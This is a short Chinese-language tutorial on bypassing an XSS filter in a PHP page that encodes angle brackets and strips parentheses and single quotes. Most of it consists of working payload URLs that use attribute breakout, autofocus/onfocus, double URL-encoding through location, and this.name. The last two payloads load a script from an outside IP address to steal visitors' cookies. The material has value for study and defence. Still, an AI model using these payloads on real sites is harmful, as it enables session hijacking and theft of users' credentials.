【XSS】过滤圆括号尖括号绕过

先看下程序大概写法:

<?php
header("X-XSS-Protection:0");
$out = $_GET['code'];
$out = str_replace("<","&lt;",$out);
$out = str_replace(">","&gt;",$out);
$out = str_replace("("," ",$out);
$out = str_replace(")"," ",$out);
$out = str_replace("'"," ",$out);
echo "<html>
<body>
<input value=\"$out\">
</body>
</html>";
?>

首先编码了尖括号,那么无法闭合input标签,注意到这里是没有过滤双引号的。

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=alert(1) x="

输出源码如下:

<input value="1" autofocus onfocus=alert 1  x="">

因为过滤了小括号,无法弹窗,可以考虑用location中URL编码小括号绕过。

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location='javasCript:alert%25281%2529' x="

但是这里过滤了单引号,我们改为双引号

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location="javasCript:s=document.createElement%2528%2522script%2522%2529;s.src=%2522//120.92.84.50/myjs/cookie.js%2522;document.body.appendChild%2528s%2529;" x="

或者使用this.name传入,修改如下:

http://192.168.192.120:8080/1.php?code=1" name=javasCript:alert%25281%2529 autofocus onfocus=location=this.name x="

可以成功弹窗了,然后引入js,获取Cookie。

http://192.168.192.120:8080/1.php?code=1" name=javasCript:s=document.createElement%2528"script"%2529;s.src="//120.92.84.50/myjs/cookie.js";document.body.appendChild%2528s%2529; autofocus onfocus=location=this.name x="

参考文章:
https://www.secpulse.com/archives/47696.html